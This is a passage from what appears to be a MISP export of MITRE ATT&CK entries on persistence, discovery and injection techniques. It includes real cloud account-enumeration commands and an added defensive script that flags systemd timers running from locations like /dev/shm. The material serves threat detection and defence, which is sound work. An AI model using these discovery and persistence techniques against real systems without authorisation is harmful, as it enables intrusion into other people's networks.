https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events

https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml

https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://technet.microsoft.com/library/dd315590.aspx

https://twitter.com/leoloobeek/status/939248813465853953

https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/

https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain

Web Shell - T1505.003

Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW)

In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)

The tag is: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003"

Table 6034. Table References

Links

https://attack.mitre.org/techniques/T1505/003

https://github.com/nsacyber/Mitigating-Web-Shells

https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html

https://www.us-cert.gov/ncas/alerts/TA15-314A

https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/

Systemd Timers - T1053.006

Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)

Each <code>.timer</code> file must have a corresponding <code>.service</code> file with the same name, e.g., <code>example.timer</code> and <code>example.service</code>. <code>.service</code> files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to <code>/etc/systemd/system/</code> and <code>/usr/lib/systemd/system</code> while user-level timers are written to <code>~/.config/systemd/user/</code>.

An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.(Citation: Falcon Sandbox smp: 28553b3a9d)
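An added audit example (not code from the MITRE ATT&CK or MISP projects) that applies the timer/service pairing rules above to a constructed set of unit files: it resolves each <code>.timer</code> to its <code>.service</code>, classifies it as root- or user-level by the directory it lives in, and flags services whose <code>ExecStart</code> points into world-writable locations (or, for root-level timers, into home directories). The unit contents and paths are constructed; the <code>Unit=</code> lookup assumes the referenced service sits in the same directory.

```python
"""Audit systemd timers: pair each .timer with its .service and flag suspicious ExecStart paths."""
from pathlib import PurePosixPath

PRIVILEGED_DIRS = ("/etc/systemd/system/", "/usr/lib/systemd/system/")
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")
HOME_DIRS = ("/home/", "/root/")

# Constructed unit files keyed by path; not taken from any real system.
SAMPLE_UNITS = {
    "/etc/systemd/system/logrotate.timer":
        "[Unit]\nDescription=Daily rotation of log files\n\n[Timer]\nOnCalendar=daily\n"
        "Persistent=true\n\n[Install]\nWantedBy=timers.target\n",
    "/etc/systemd/system/logrotate.service":
        "[Service]\nType=oneshot\nExecStart=/usr/sbin/logrotate /etc/logrotate.conf\n",
    "/etc/systemd/system/cleanup.timer":
        "[Timer]\nOnBootSec=2min\nOnUnitActiveSec=10min\nUnit=cleanup-run.service\n",
    "/etc/systemd/system/cleanup-run.service":
        "[Service]\nType=simple\nExecStart=-/dev/shm/.x/run --quiet\n",
    "/etc/systemd/system/orphan.timer":
        "[Timer]\nOnCalendar=hourly\n",
    "/home/alice/.config/systemd/user/sync.timer":
        "[Timer]\nOnCalendar=*:0/15\n",
    "/home/alice/.config/systemd/user/sync.service":
        "[Service]\nExecStart=/home/alice/bin/sync-notes\n",
}


def parse_unit(text):
    """Minimal unit-file parser: {section: [(key, value), ...]}; repeated keys such as ExecStart are kept."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, [])
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current].append((key.strip(), value.strip()))
    return sections


def values(sections, section, key):
    return [v for k, v in sections.get(section, []) if k == key]


def service_for_timer(timer_path, timer_sections):
    """A timer activates Unit= if set, otherwise the .service sharing its name (assumed in the same directory)."""
    unit = values(timer_sections, "Timer", "Unit")
    name = unit[0] if unit else PurePosixPath(timer_path).stem + ".service"
    return str(PurePosixPath(timer_path).parent / name)


def exec_path(exec_start):
    """Drop systemd's ExecStart prefix characters (-, @, +, !, :) and return the executable path."""
    parts = exec_start.lstrip("-@+!:").split()
    return parts[0] if parts else ""


def audit_timers(units):
    """Return (timer path, scope, reason) findings over a {path: file text} mapping."""
    findings = []
    for path, text in units.items():
        if not path.endswith(".timer"):
            continue
        scope = "root" if path.startswith(PRIVILEGED_DIRS) else "user"
        svc = service_for_timer(path, parse_unit(text))
        if svc not in units:
            findings.append((path, scope, "dangling timer: %s not found" % svc))
            continue
        for exec_start in values(parse_unit(units[svc]), "Service", "ExecStart"):
            exe = exec_path(exec_start)
            if exe.startswith(WORLD_WRITABLE) or (scope == "root" and exe.startswith(HOME_DIRS)):
                findings.append((path, scope, "ExecStart from untrusted location: %s" % exe))
    return findings


if __name__ == "__main__":
    for timer, scope, reason in audit_timers(SAMPLE_UNITS):
        print("%s [%s]: %s" % (timer, scope, reason))
```

Note the asymmetry the scope check encodes: a user-level timer running a program from that user's own home directory is ordinary, while a root-level timer doing so deserves a look.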

The tag is: misp-galaxy:mitre-attack-pattern="Systemd Timers - T1053.006"

Table 6035. Table References

Links

http://man7.org/linux/man-pages/man1/systemd.1.html

https://attack.mitre.org/techniques/T1053/006

https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a

https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html

https://wiki.archlinux.org/index.php/Systemd/Timers

https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/

https://www.hybrid-analysis.com/sample/28553b3a9d2ad4361d33d29ac4bf771d008e0073cec01b5561c6348a608f8dd7?environmentId=300

https://www.tecmint.com/control-systemd-services-on-remote-linux-server/

Startup Items - T1037.005

Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.(Citation: Startup Items)

This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, <code>/Library/StartupItems</code>, isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), <code>StartupParameters.plist</code>, reside in the top-level directory.

An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.

The tag is: misp-galaxy:mitre-attack-pattern="Startup Items - T1037.005"

Table 6036. Table References

Links

https://attack.mitre.org/techniques/T1037/005

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Cloud Groups - T1069.003

Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.

With authenticated access there are several tools that can be used to find permissions groups. The <code>Get-MsolRole</code> PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).

Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command <code>az ad user get-member-groups</code> will list groups associated with a user account for Azure while the API endpoint <code>GET https://cloudidentity.googleapis.com/v1/groups</code> lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation) In AWS, the commands ListRolePolicies and ListAttachedRolePolicies allow users to enumerate the policies attached to a role.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)

Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS <code>GetBucketAcl</code> API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Groups - T1069.003"

Table 6037. Table References

Links

https://attack.mitre.org/techniques/T1069/003

https://cloud.google.com/identity/docs/reference/rest

https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketAcl.html

https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest

https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0

https://github.com/True-Demon/raindance

https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/

https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/

Email Account - T1087.003

Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)

In on-premises Exchange and Exchange Online, the <code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)

In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)

The tag is: misp-galaxy:mitre-attack-pattern="Email Account - T1087.003"

Table 6038. Table References

Links

https://attack.mitre.org/techniques/T1087/003

https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019

https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist

https://support.google.com/a/answer/166870?hl=en

https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/

Local Accounts - T1078.003

Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.

Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement.

The tag is: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003"

Table 6039. Table References

Links

https://attack.mitre.org/techniques/T1078/003

IIS Components - T1505.004

Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)

Adversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously compromised hosts.(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Extension All Incoming 2017)(Citation: Dell TG-3390)(Citation: Trustwave IIS Module 2013)(Citation: MMPC ISAPI Filter 2012)

Adversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports <code>RegisterModule</code>, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Trustwave IIS Module 2013)(Citation: ESET IIS Malware 2021)

The tag is: misp-galaxy:mitre-attack-pattern="IIS Components - T1505.004"

Table 6040. Table References

Links

https://attack.mitre.org/techniques/T1505/004

https://docs.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview

https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms524610(v=vs.90)

https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525172(v=vs.90)

https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525696(v=vs.90)

https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf

https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/

https://web.archive.org/web/20140804175025/http:/blogs.technet.com/b/mmpc/archive/2012/10/03/malware-signed-with-the-adobe-code-signing-certificate.aspx

https://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html

https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-curious-case-of-the-malicious-iis-module/

Network Topology - T1590.004

Adversaries may gather information about the victim’s network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Network Topology - T1590.004"

Table 6041. Table References

Links

https://attack.mitre.org/techniques/T1590/004

https://dnsdumpster.com/

Unix Shell - T1059.004

Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.

Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.

The tag is: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004"

Table 6042. Table References

Links

https://attack.mitre.org/techniques/T1059/004

https://linux.die.net/man/1/bash

https://support.apple.com/HT208050

Cloud Accounts - T1078.004

Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud or be hybrid joined between on-premises systems and the cloud through federation with other identity sources such as Windows Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)

Service or user accounts may be targeted by adversaries through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain access to the environment. Federated accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments.

An adversary may create long lasting [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication.

Cloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over-privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004"

Table 6043. Table References

Links

https://attack.mitre.org/techniques/T1078/004

https://aws.amazon.com/identity/federation/

https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction

https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs

Cloud Account - T1087.004

Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.

With authenticated access there are several tools that can be used to find accounts. The <code>Get-MsolRoleMember</code> PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command <code>az ad user list</code> will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)

The AWS command <code>aws iam list-users</code> may be used to obtain a list of users in the current account while <code>aws iam list-roles</code> can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, <code>gcloud iam service-accounts list</code> and <code>gcloud projects get-iam-policy</code> may be used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Service Accounts List API)

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Account - T1087.004"

Table 6044. Table References

Links

https://attack.mitre.org/techniques/T1087/004

https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list

https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html

https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html

https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest

https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0

https://github.com/True-Demon/raindance

https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/

IP Addresses - T1590.005

Adversaries may gather the victim’s IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and/or where/how their publicly-facing infrastructure is hosted.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="IP Addresses - T1590.005"

Table 6045. Table References

Links

https://attack.mitre.org/techniques/T1590/005

https://dnsdumpster.com/

https://www.circl.lu/services/passive-dns/

https://www.whois.net/

Visual Basic - T1059.005

Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)

Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)

Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking)

The tag is: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005"

Table 6046. Table References

Links

https://attack.mitre.org/techniques/T1059/005

https://devblogs.microsoft.com/vbteam/visual-basic-support-planned-for-net-5-0/

https://docs.microsoft.com/dotnet/visual-basic/

https://docs.microsoft.com/office/vba/api/overview/

https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)

https://en.wikipedia.org/wiki/Visual_Basic_for_Applications

https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805

Proc Memory - T1055.009

Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process.

Proc memory injection involves enumerating the memory of a process via the /proc filesystem (<code>/proc/[pid]</code>), then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target process’s stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target process’s memory map within <code>/proc/[pid]/maps</code> can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man)

Other techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Proc Memory - T1055.009"

Table 6047. Table References

Links

http://hick.org/code/skape/papers/needle.txt

http://man7.org/linux/man-pages/man1/dd.1.html

https://attack.mitre.org/techniques/T1055/009

https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html

Link Target - T1608.005

Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link.

Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target; this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.

Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022)

The tag is: misp-galaxy:mitre-attack-pattern="Link Target - T1608.005"

Table 6048. Table References

Links

https://attack.mitre.org/techniques/T1608/005

https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/

https://blog.talosintelligence.com/ipfs-abuse/

https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/

https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service

https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian

Device Registration - T1098.005

Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.

MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) In some cases, the MFA self-enrollment process may require only a username and password to enroll the account’s first device or to enroll a device to an inactive account.(Citation: Mandiant APT29 Microsoft 365 2022)

Similarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537)

Devices registered in Azure AD may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Azure AD tenant by registering a large number of devices.(Citation: AADInternals - BPRT)

The tag is: misp-galaxy:mitre-attack-pattern="Device Registration - T1098.005"

Table 6049. Table References

Links

https://attack.mitre.org/techniques/T1098/005

https://o365blog.com/post/bprt/

https://o365blog.com/post/devices/

https://o365blog.com/post/mdm

https://www.cisa.gov/uscert/ncas/alerts/aa22-074a

https://www.darkreading.com/threat-intelligence/fireeye-s-mandia-severity-zero-alert-led-to-discovery-of-solarwinds-attack

https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft

https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa

https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/

Cloud API - T1059.009

Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud Shells, [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules like Azure for PowerShell(Citation: Microsoft - Azure PowerShell), or software development kits (SDKs) available for languages such as [Python](https://attack.mitre.org/techniques/T1059/006).

Cloud API functionality may allow for administrative access across all major services in a tenant such as compute, storage, identity and access management (IAM), networking, and security policies.

With proper permissions (often via use of credentials such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001) and [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), adversaries may abuse cloud APIs to invoke various functions that execute malicious actions. For example, CLI and PowerShell functionality may be accessed through binaries installed on cloud-hosted or on-premises hosts or accessed through a browser-based cloud shell offered by many cloud platforms (such as AWS, Azure, and GCP). These cloud shells are often a packaged unified environment to use CLI and/or scripting modules hosted as a container in the cloud environment.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud API - T1059.009"

Table 6050. Table References

Links

https://attack.mitre.org/techniques/T1059/009

https://github.com/Azure/azure-powershell

SEO Poisoning - T1608.006

